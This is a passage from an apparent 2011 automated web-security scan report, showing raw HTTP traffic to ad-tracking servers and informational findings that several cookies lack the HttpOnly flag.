NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_MY90="MLsXtTENJApvJ5G+ytKgxLFQnfhOvCZv6FO6CurHXyYWkAe+EasvQnCHlydISIvg6236xT5EkEKMfo940PLKv0Tau7/kXCp5zON+KvoIR0YysTSXDOUbA8aYAlYHE4yajpXdNhPjdin4obM+H3eD42HyUGjF+uFXXE19h82S+rXLFx74NhYdj7mH/sKC97yeCayhf+JKEGKh52wcDFRH5g2T3kWkbr54fzrshgXw1yD2LNJVEjkACVJj5t373xGcnF04H4YlrSiVuj6/gJds6ykU9mxQ9EgJdlCyPjkdCkBN6wfuCepTroVj9Ys+eHa4GMBjiB6jXIvCSOqAosVLexvG60GNp3GE8vnqWDkVAYUjZ/lmSRW15P0af51D0fst1/52VQkd3rUyVC8aU8MevlWIBqQSidblnHielYlJYNwJC2bxftDMoS+YshtrAQSiEgnEtjprGqA9stWxVXsQirsAJ/DKEQtNo+/wzizKXcv+LqGgRnfXzp+twYZpd1obxPo65OlJDyyOlQ6tx7/PHQ03C8b5gHMSXvO7iocFvO3/RTmJ98R4/ayQaqi0uOeA3r0hJhuxxyyus9liHcib+i+/EvJXzcerWGN9/CukxVFHWe1isERDSJtavoCupUP0Tic2sNI7/EJo1WW2ejVxy0OHl/ObIrqZmKfEJ3p6c/2w0P02c6ejfQbNuUFI0b5EieETjzXuZngc8K2op3/azs2FYRNOdg3wxcS56I1KyncfHzx9HM8CUgS+D44DSF+CFLSumiZqQxnCuaMV7tl3EqfVevRLCRwKCuMVvtShingUoyRYyIWBOnv/GtI+AsrrE7W5D48y92ejEL/MsuF3GBKEs+xarNUIcJdrSIgOy8YPlIb7J9fT17noE2aNd7hOwbvxiSiNJ4I0QtfEaG0ye7p43h2irYpmbvT9O8Y1n69IHJskT5zOplbKAxNN6xHIn7p9m81q5+3S797YmPlZNaqdtJQWTHjqKrmDKX1YHsnQjQ+/eJHM4BmOpNP9NmvtiqU0qwdBF+B80wuPxjkzVhvL3SpX2LbloGyIIAr07Mf4wCPL4khi4sWK+54SVcYzTecSHuW+lSVjvWp4JkAKYvquRX9Oi/m9pVDiQbu+i3uLHVGg+GRJutJBxsSQqQq5Sx91hqLmLDmj47zbflxQuX1tWdUSFMfQ/BzgRaJCCIArC0lGrigqgkzAVa9GeWYlRJ4jJsGw7GRjplSyRQci9Di1e1V47pPPow1zF5yI7KW+CivQChiKEj4Mxk7FcLXl06zMAKw8d7xsU0VtbCuGWMxV6ZPP2hY36mj+OnHQojc/ZVB9TX2v1vZCk4r7HLud3omQATdd0tJzJTxzaXzrGoxD9FhCY6YcJK+VoFezEglxBSlCKHbhSjYjoAy/nBghesQCOg3UuEDY3M+Nmwl0Y6RiPkfbUQAgKCfxGIkc95u66lxjklLwoA0ttUIqQOlfuRFQ4AuT/4bi0yM2KwZb5/e3GlucsbpG7wbsL40Ix1Knk4b41qGIQ0UvLsj+uBd7BT+fkLVmerNwMgm8MzP8liUJBjDxUy7tS8QKO0fCqwDvg0JjOkWECausCLUTuyZ8hg=="; rsi_us_1000000="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"; rsi_segs_1000000=pUPF40+huXIQJ/AtY6gq+mlXT522ui70QG+tPOGd4NRyLwW+GBoO/QIm6/r8UGBZzhrwA7FdOTrGxBWBsOBtAdzAlLnM8dApt8wVcHEuGKkIv/xnoXkCKOuMJ7GVLDaXCKdqoYV39ntMHDxCkO6EVyoNTQYIH8TkX0Et1Eiq5/KbBpz///U5+5yo8ab8YxvBGv1FwQnNBrIY+2XqEFq70QelooumzDZDN7F0yjw5hr+0usLShHSk85G79wKPrYZGYUHTBr/k1Vjwn7vJbWxdYvvp9s9a7l/ADNz0HJpmUnDthLuuPQzuwWd85WF7PhoQ3CrqrY/Y6dQapUXauDlge1kr1Xbxh7dhTcbLyjjRKwdV0YmMpXX+SgsEjQDrbL8glK2+sym8dowcMiMvLMFuY6kEkwu1k5HKZqM64pn4bZINbso33dvkG6srYnY0+/jGL640ayifNG0T+W/P/liudyTJOAcyFE9PzuTOvTALWI222hK0wGsqSBnz17Ld5tOY8lrzCrV2Y5IjYnqkLSPbFISKkvYJHNQh7/kbSvH9hg7WsE2meizntD0kreezMI4P5FDeHL4ygt3xpTxuVxGQOYek2w7cHtzRiFPfuTdTqLMEQCUhLOAY2NHXYC/a8amOno/u36LXlrz0hQ49gSOqDDxuv26U22Nr3BJ2mYI/3T5I1bosPFY2MERuEl7b8fa99bFjBuwu3kuqd4EnIXKr41eE+YrNzpy9lNSHsVTaIscSGgfZSxCQy+22xeO+OkFrnFGyBzgw; rtc_IEeH=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; udm_0=MLvvNzMNZjhnHrjq/8xBGTEDYJMzyjPPqEpc6N3o878UDS7ekFMZ0NQVFVYB3OpUUwWT/lTpPPDhAu3HMzQ/N0Zneon5hatIaA/AsAqQQzGUP/a1i6P1OEwoGsCMIlLRuK/NGPucow//mMmCvogsHGU5yqJU7CMt7vnbxTHTfPS12oHBFQLmW9DqJF+zOOS5UtTHuf+C5kvxnyhldBfCRUxhDfaQmRYgR7ppfK2Pf8Kyx2r0lYLWITaKCrr6IrdbmYLokg0G9+h/+v+sjwnt5/gvwGemVnARo6d9GpV+IGfCFNNtSD9g4WDhR3kGsQkaVWu1e3egVbUe4b/cmZNHQj3LBqzTcocLNnBqmkL3ycvPtBX6udKt4c0O7Pl8o3dRU+cwqhETRP0Yvcu9cmiL6oW74KIPoknWY/+lo2hKDiY1o8F5KEF33Wn/97Upq9cm4yD7jLGq976ZEw7Lg6naKOEZZiBHBmEzR8GhQdcg9fhNJ8DYV8KiJA759fwsc8lBi/0nh05XjsHcbziMSGN5s8HLJSLiyHOpXbEMAkLjgIxKYxbp/94dq4G4U39Z4T1g73+A23BlLTJq64obpP4fVlNlYqByAu9Z0SUCt7wpNciJANDl5GrpBEEkZWJhwGl7DS7eEEtwSGLEEzj0ROloiNBYRXxIihFn1h0AyxIfI3XVSgzp4GOqCkNKc6ogGfaB2QGzE9VaFwncSzmaKvsnqArbyzlXvdqDK5rN0BpF8oJ5NpU/7kfGHhit1Hd/A4D15Y6B3YOL6l2f4/gya2vVGJFQmKpc0l0TWLy9zfe7vASjxW181FIBfdJTzu4rj0vcOkcNnt+YoQlM3RCAgE9ZNYbqDUmtj+TuBJ/0IpqD5POoPse2cvqVt8Hh5lxKXeB9hGUXocic2EClAshD59hq/DBsmNyxirCc1GLRVtEZldWY7rzHpngblfYK50KhGezX/6AtyEMGx2jSLo0esObJ6y12qq8v3+IFxpnX+X9oVW3PbqVTQvWS5zHFX09pLwKQxhIjfmwPXzB3tSHK8uQ8KuXYsBnojkTo+YKxKYsnrC1IcIbcxagrEPQk4/DdFi8C6J67CPULfFOFMm55BO2TsvQY8UcTZfiVsHLP7bCLlJTaQbzuvCO+Vl2q+EMTY0u5V17OndOIteJCZIMjCT8N6/fTr+8V6ODG2zy5QBY18ef3kg0g+eT3SZqHGv3txamtal/0htoFQsTsyVV1DtJ9wUnL1YnNoQT1M9moQ1KiWJHGBwc7BmeM0egx7xl8dYCmjF/+06Win/g6374teZiXyQRwFI8vbRxn431hPEBMQf1/GPY3SWL6EsZI9UCA87JucbRJh+HWm1cENJvz9In26LFQbzILdM8cpl6HtUzw1ZnYHZKRmrUdEKFY6/7jahi5QV+8vSdbLwHOsVb1hc9n5JM5WM1sgaqprPBGbV3OEvjTaOqB9N4TuVgnVXgi214p5oY7PCOL17I1CLGU+zvM6+6iN3c0hzRAHT5IALyyWucCbAdjy8YPhquPAoPmwWGwn2Vyp3mv3c1mGuzo6zSAT3UikW1xCBKSiLMiB5azg69WOTLqOzputMjpmpuvN19e+uclMRmaajH2b+Rm0mTAVzzv5S2fDH1w2TZAKFQtZ/9tEHunLIMLDnRYH2UBn9T5acy7cHkN/iksNldq7+9ScxK7HJVj9m3hE3CL6Q1bzXp6y6Rxh5AaA93zw3/dyDIan4+ZLcbtQyaFC+MHO4T8zifrwa9JYzXOrjE/aJnJPmahXszJNYzEORXkl1RwWJWZjIxiOxvLZQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_MY90=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_x5er=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lwqf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6hCD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_MY90=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_x5er=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lwqf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_6hCD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oJjm="MLsXtTPtJzpvJZG+wNyGBujwiYNk7SFCxPYIhapH/IGgu8fvW/7KPaGxWqTZFTkDb1sV9WOkX/+4J9exogBS/W8+PGyhBWzrdaAnGae4NpMotzSX3+fbscKgY/DWqapdjtT2qzUsVTV6Th6TO+kyXRu9fLtLw7vLwXnP5fnsu9+NlSRLiaJDkMuFliEf9YvaMjspmYt7E04OrDV/IsZUzRCiACYJUbSk06G9ZmN9h9NgyIr5FvCdnll+3wHTsoDnywXw3tZMJoS03uc587n7YXcmOxPh3+MOvoXktyzzD4Z48gvSLJMJpwFjzLw/OQQSvlSH3Vyqzvz+B6NOezUmDnMM6DJabgBJH880uYDKg90Dsd2YVnT4fgILqcaPrnmYkodFavvqHEWjmSPwbYF02muaHAAF4tpqRPcq09KqJ1xU6gCiS54lEYaZ8EWjqLJmJmw/He8mJ2nubAESlT4mv+uYQKNjhqAJ8MAd72HjqFV/GxMRX+29jo9VCZG1OuoNOD3mx5KMUSaJmeIPt50vJFqPkGH0gOY9/jGKFx5TxJvidm+LSTFySpjOAqKL40vw7tUKcBkSUKNKBjFo2q79oM6rPyJ+sVOYW2NdkC+jxXGHWO2asCRCSJVivoCWRUP0TiUR/zP3qRxiynPLU8lQMRG/whXlNxRV7fQl135FeZrQH0b0BlJ/VBo6GhbwAR0TsdWcsfdXrqOTgGOCkVyG2IzFJ+l2/pNhq8A3ZImb9RO7rHEbuPHlmswMqfghlJsgUwz3on17Tfo+WMi7tRJ/tarVetQFrFoymgmMLwpXGBzwOFuQgKts/0kN2e1apqwUgyRvLvuFjDu5vOyGhFqczB/jg3EAXtmuo5KolGEcMBVBy2i0HKK38Yp1vVpITc0foB+i3o0LHSeCfptjsnGPDPCRNqDxBkV/GL7SrC570lKpwTKPmMBpekAMsPSWWsdhaMJHlI2YGZv5XZCJ6e/bhx/Bwc8B1ECZtV8Os1TKs8GGtfNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSoJRpS6MEOY9qIEJnzfEO5CspC14SRNUYfy4EN2YSMeFCwbHaTRq6PBlI3YSnbBgBjEUOdiRfZYFBw3z2kq9Xwik18Hwnd3LCfOMfi8ZfOrZm02ilpkHrAxvmWcMWZ+siww8KxcTCXYrhwRUe6w8/3f0lpRamp1EhK02b16hIAO5QosZIfkUX+H3kUTDm6dNiQRpTWp8CMcp0Fc4N9hiKef3Gn7KSeB8Pi4SQmYOlJQisnsHlYi5EnUaloxDPDlETisJnGzC4xvinBGMuB4TBQrFgzVk1JfriXBtIM5rlOI0ZnpqXkwme3oGAAT9d0tJzJTxzaXzrGoxD9FhCY6YcJK+VoFezEglxBSlCKHbhSjYjoAy/nBghesQCOg1UOKHb0MONmzl0k6RjPkfbUQAgKCfxGIkc95u66lxjklLwoA0ttUIqQOlfuRFQ4AuT/4bi0yM2KwZb5/f33lauy9Y5aoa8S7qyOhHFR6gSeN9xEjs+6zNAyp1fasWiQcitQN19+KbXB8xbuNe9mgBZMjxoJhR14xEh72F9ZyN93eqG/MpGh9hTIXcOfiU="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMV4ilHMAYUro/ilB0Ovd8onIwIjpdK1UYjvtvC/kpFI4lyOCK0yxmLLfrYxyUWQuB7DE92NIRK/sSMTh621RFIIhPAGMOScjAP7MPVFOK0x9gNoW7b1rgdrDZyIAOp9qs86evFMACnI4CF3FTlWgGBT0BUeS+9VjfUpcGhYoQo1WhXs6fyBUyjWBUf7ziNBZpxYjW95JqVgRKmRFrv2clqUkSpLBBtRgQBJ9Ienz1U8A7o3hKO6wfQM5+D9nX78ebFN2+YeE2eGPzlbffbPZRWBjtgd4XZCKoEo4pL4FwIGVIcfKnoK8v/CojHQEj07kXAbCRVqRF3IPKysjJ7hlRf/DqtA+Glpjo7ZLJ5KWpr0sSmJnZTDlIWigTRdOa9q8yfVZ+8fN+6qW3ZogppXI+Fj28cIKq2efjC5NuXeJmte652EPwjTB1C3J0Z9fun9uGwj19lR8VEC/CFzZDjw/pg8JqCFLrag37IMvLo5js1LY5D3OlONE1ngVXKBBWQuX1OlDZ5vDYblp/xjvrNWJ6ejeO0nbCZVhEzCBtLjwKU7VxtTQ1278nWO3NNiz4lGMJCapHHGm4F7TEIS7wMXJDGy7OdDGOnPprjAgUc5vmyCQoiLuZALwsNnyEFP2metczO5OTpca5YCu2Z0WFdA+X1S9HfjeH9aibJ1Lwnsy0BJxqhvP20u/LoRqLm9a00MrNdt/TJS5OfkP0G1zRDhY1g9laQxZQlWTxOdXqUZwykHP6bKbcE0vnGPpgN/PRnfA76+i88jL3B1kEFTCK3J1Vv0a8xmXxJWf59tNLexse2UGxp8FF8GqiYs73FqKosPS/P+43JZ3WJfXukjBALD/rUTYwrFmbJxo6UuvCRLFzYTYaZ0VaLrJPP0uDeRt0pApaB8GyHKfgsEjdaJGQDYIOV1playfYA3O6+9tpWwz9r2vFnPBRRRehpTBcCqBXtcv3G/gyfXMLJ+R6v10xJwRJOeV6vERc48uzsfemXZE/N1rTnUGTmAKUZX2m2/yVLYalQdekmbxG0RMntmaI3Ix1TAHdEm0KCWcz9IicFycnZjvDzdq7UM3d94tFHktV5njewdsmZ1FvNBShUWDcj+j/F6UtggGx+JSWJVOlP6vNix0CcW3eanJ4EIQBikTnl/DB0aYFFQY9U16SQlrpedeZ7SK4J4lTYXrZSNtjJmi6b5mvLpfuW6eZBgLXyO6vAlX//UMOgJ2a6vMB2wWSunR5ELtxnOrP/gXAR7ZQcXMOBbGK1lGnj0cMSvl2AJx0gP/3UVVDfiHmaFBCMPS9/12MdSUz7iLeHiP3p94rGOuAy0sy34EiVQ3WwVQIsdEmif9i7/oAdh1Nzs4rCcMBMzyvTmvpCgA0V6f30yOb0M3uUp6yCLK0+o59ezKJzMhX6i0yppj5GGE9YZGXKCoJt5WcFzCNw0bh6nN1cQ4a8X3rwmEtXoDJB36Xy0EpIrTP6Y+tkviIaTYKf7JiSm4i0eK7PtKVJ8vH40QfdnTkQ5AvpqOhRvO1A13XCSlW0oT2gS1AvJkBuwe4pM6N/VDoiM0V5LXSkHYl7JHR7+0mGFXjCr47/WcR0KYYzaN2v/pyojJU0InEsLXAOdmKGcZwDlKKVQLfZXCXrndgP0hSLZGbAVam2z0efr72V5L+FRZjVSjYAsRlFo1ZAS7a80QdCnNMfJUo25fsd4i7LKGvhYx4GAfcY4fa3sS6aLgcRZTbW6q3mj2ppueghT+hrtmeO/3mU2RHZhHBoSyng7gzUMRbskS6spLwJNwWJRyQmWwXQ+JO37hQNV6uC//zlW7dFwTAPe4uVCL7KrVZc6E7Yx3SE2HCMfNFdE+NyWmQbF79s7vlWQOdgbF0mfKEuT+nLwIwohtSefdgNlf0ywF51pJhoLQH+0CghH6xH//2L5WEOF3uuXFAwTB57dCKFadBTPSkJDRHzOd764LInw3IDyCOguGOayImrcGQ9bRqUlzlimHQgpD7TEYC9m4pBOgBbTb53qN8/hF3IDg=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 13:09:39 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

8.11. http://ak1.abmr.net/is/tag.contextweb.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/tag.contextweb.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-659F213F13AEF608515B2A1D42365F3AD36653678D8F0804D1131815B41FA314-22ECE0AB9E28375ED7A4C7AF800948510BF0A2483DE5E3A27F6657AB3FFD20BF; expires=Fri, 22-Jun-2012 13:44:49 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/tag.contextweb.com?U=/TagPublish/getjs.aspx&V=3-GE7c2JaQhQnjGqv923Rod21vR9ozV1dso6ZbP9yW%2f51+1Dqxzav0dUGFNG0n02ex&I=8A2A9A5B6788565&D=contextweb.com&01AD=1&action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=527663&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=82878 HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-5AC38C10B84769287718D03B3FCE7F71FDABEB6D67255C62F77FDF682CD7D468-70577DB16B2070E042F42C4AFB877E98E38F4F9689439EB0CE395A43D01B2D2E

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.contextweb.com/TagPublish/getjs.aspx?01AD=3GvBRapOLfgBKr3goSOz3fO63q6ul6WbfQWkzDbH6CZEOLuv5CjTz9A&01RI=8A2A9A5B6788565&01NA=&action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=527663&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=82878
Expires: Thu, 23 Jun 2011 13:44:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 23 Jun 2011 13:44:49 GMT
Connection: close
Set-Cookie: 01AI=2-2-659F213F13AEF608515B2A1D42365F3AD36653678D8F0804D1131815B41FA314-22ECE0AB9E28375ED7A4C7AF800948510BF0A2483DE5E3A27F6657AB3FFD20BF; expires=Fri, 22-Jun-2012 13:44:49 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

8.12. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 22-Jun-2013 13:08:29 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

